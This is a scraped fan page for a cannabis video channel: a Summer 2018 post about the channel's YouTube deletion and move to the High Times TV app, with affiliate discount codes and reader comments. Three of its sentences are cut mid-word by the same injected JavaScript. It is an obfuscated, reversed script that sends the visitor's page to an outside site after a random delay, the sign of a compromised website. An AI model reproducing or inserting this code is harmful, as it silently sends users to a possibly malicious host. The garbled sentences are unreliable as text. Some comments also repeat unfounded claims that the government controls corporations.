What Happened with YouTube? Introducing High Times TV: State of the RuffHouse (Summer 2018)

Welcome toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to State of The RuffHouse update for Summer 2018. Today we discuss what Happened with YouTube and the new High Times TV app as well as the future of RuffHouse!

RuffHouse’s High Times TV Channel:



Watch this and hundreds more cannabis culture videos on our site:

Affiliate Deals:

THC potency tester for oils and butter: Save $15 on the Base Unit as well as the add-on pack with the code RUFFHOUSE

(Mighty Fast Herbal Infuser): Awesome herbal infuser machine toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to make infused oils and butter. Save $30 with code RUFFHOUSE

(My Press)Personal Rosin Pres System. Save $30 and get free shipping with the code: RUFFHOUSE

(Wax Liquidizer) Excellent solution for turning your wax, shatter, rosins and more intoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to delicious e-juice. 15% off purchases with the code: RUFFHOUSE

Social Links:

Music Attribution:
“Hard Boiled” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0 License

“Rollin at 5” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0 License

Youtube Channel

35 thoughts on “What Happened with YouTube? Introducing High Times TV: State of the RuffHouse (Summer 2018)”

  1. Thomas Warfield says:

    Glad to have ya back.

  2. Angel Gutierrez says:

    Glad to see ya back on!!!

  3. T Pappas says:

    Yay you're back!

  4. Rafael Sao Paulo yeah says:

    Great job man, I am happy that you will keep up with your awesome work 🙂

  5. KDeKay Sleep Sounds says:

    Unfortunately, volume won't go high enough to hear you.

  6. Roman says:

    Was so sad when your account was deleted. Glad to see you guys back! One of my favorite accounts on here.

  7. Hans Nossing says:

    Also the Troy channel, 420 VapeZone, has been deleted! contact him, friend!

  8. Joshua Villa says:

    Sorry bro. I may have had a hand in the deletion.

    My reason for suspecting this is because I am a Trump supporter and have been watched heavily on FB and get banned every other month for 30 days and I recently came upon your channel and love it .

    I am betting that if there was a way to see affiliations of subscribers you would see a growth of conservatives on your channel.

  9. Heme Heru says:

    Thanks Matt , We appreciate your determination in finding out what happened…i love your content and will follow u to High times tv…Youtube doesn't understand that those of us that wanna show people real news about the benefits on cannabus use the many YouTube channel about cannabus that were deleted to convince those who are on the fence and true benefits of cannabus but YouTube is showing that it's like Facebook and is a agent instead of true FREEDOM videos….it has change the way i see YouTube..Thanks Matt again your a Patriot..

  10. D O P E V I L L A says:

    They changed all cannabis videos they have the adult understand button now. Their ai guys probably messed with some code that flagged cannabis channels

  11. ADKyogi says:

    The most eloquent of cannabis gentlemen.

  12. Juan Hidalgo says:

    RIGHT DAMM ON…keep those great videos comming! Greetings from Costa Rica! Pura vida!

  13. magillasviews says:

    Glad your back too, best channel of this type your changing the world

  14. Increased Elevation says:

    I miss bogart :*(

  15. Addison Watkins says:

    Glad you’re back your great

  16. Danny Rodriguez says:

    Hey glad to hear your back! Honestly it’s crazy.

  17. Stupid ComedyTv says:

    Hightimes took quick advantage i wish i could hit a lick like this

  18. Jasmyn Rivera says:

    Actually you're really awesome I love your YouTube channel!

  19. J W says:

    I wish Strain Central would come back too

  20. Skunky Bud says:

    The app is worthless. Their app asks for location and then doesn't work if you aren't in a legal state (or even if you don't let it access your location).

  21. Comander555666 says:

    Nice to see High Times stepping in! Glad you're able to continue Mat, been here since Bogart and it would have made me really sad to see this channel just fade away!

  22. thebigblueviolence says:

    Matt, I'm incredibly proud of your drive and creativity. Please don't give up in the face of ongoing censorship, you're a legend

  23. SpaceNazi62 says:

    I noticed several controversial channels went down at the same time. But are now back up. And like you no one got an answer as to why. Glad all of y’all are bsck

  24. christopher wolf says:

    It is for practice of fine tuning individual censorship that some can here peoples channels and others cannot. It is all part of the Orwellian nightmare coming true more day by day and the reason why we do not get answers is because all corporate entities are government controlled and they are beta testing all of us and it is the downfall of our free way of life unless we become proactive in seeding legislation to make law of digital boundaries and what constitutes restraining someone's liberties before they decide for us and it takes ten years just to get more legislation introduced. The wheels of justice have almost come to a screeching halt. Do not believe me just look at the transparency videos and you'll see all kinds of crimes police are committing against citizen lawfully flexing their rights and getting bogus charges and their property stolen without warrant and fake judges legislating from the bench. It is getting hotter day by day and the sun radiation is way over for health safety and no warnings. Get ready for something big.

  25. youngkirk88 says:

    Could it be true that the youtube "purge" was do to the some of the ad companies not wanting thier ads playing with cannabis related content

  26. Krome dome says:

    Hye love your content dude! Would love if you'd review our Kromedome Slingshot!

  27. Vivian Stimpson says:

    I hope you get an answer. You and all the others deserve one, look at all the views !

  28. FoshoJohnnySupreme says:

    you should voice audiobooks

  29. they are out there WE KNOW says:

    I was so fucking mad when they deleted you bro happy you’re back and we all need to come up with a new video format kind a like YouTube but where you truly do have freedom of speech

  30. they are out there WE KNOW says:

    You do realize you switching to High Times you’re going to lose more than 90% of your Fanbase bro because 90% of us live in the south and we can’t get on it because they want to demonize in control what we watch .. so looks like you’re losing me as a fan all because of fucking hard times I’ll be waiting for you to be on another format because when nobody is able to see what you post we find someone new

  31. Cliff P says:

    You know that’s so so messed up of HighTimes to block their app in different regions! They silll deliver their magazine here that we all bought and use to be under the same outlaw umbrella! Now it’s all about the money!!! What we didn’t want to happen!! You think your pissed!!!! I have Fibromyalgia i hurt all of the time!!! I have CVS you know what that lets me do!!! Loose my teeth from throwing up for the past 8 years monthly sometimes weekly for a month solid at times!!! So because youtube ducked with your chs and your add revenue!!! It finally made lazy people get up and see who moved there cheese! You need to read that short little book!!!!! Next time your mad like you were in this video!!! Try hitting your hands with a hammer and then go throw up your guts so you have to get 2liters of fluids just so it will stop! And I have the backwoods motherfuckers!! Making my life decisions for me and messing with my pain meds because others can’t keep their damn fingers out of the pain pill bottle because they like the high! Well I only wish I lived in a state that had different people running it. No money to move. Cc maxed on medical bills. An audit no telling for how much!! 4K!!!!! So next time you want to scream! Do it for me!! One that suffers daily because his state does not believe in cannabis! His state does not care for the people! We have tried and tried. I was there on the front lines throwing up.

  32. Ashlyn says:

    Are we able to upload our content on the High Times Tv App? I'm working on content in regards to cannafitness and merging the two worlds.

  33. FLYKICKS_ says:

    Thank u for the vid, I was gonna comment and ask

  34. I am not a bot I’m a real boy says:

    You have really put the weight on

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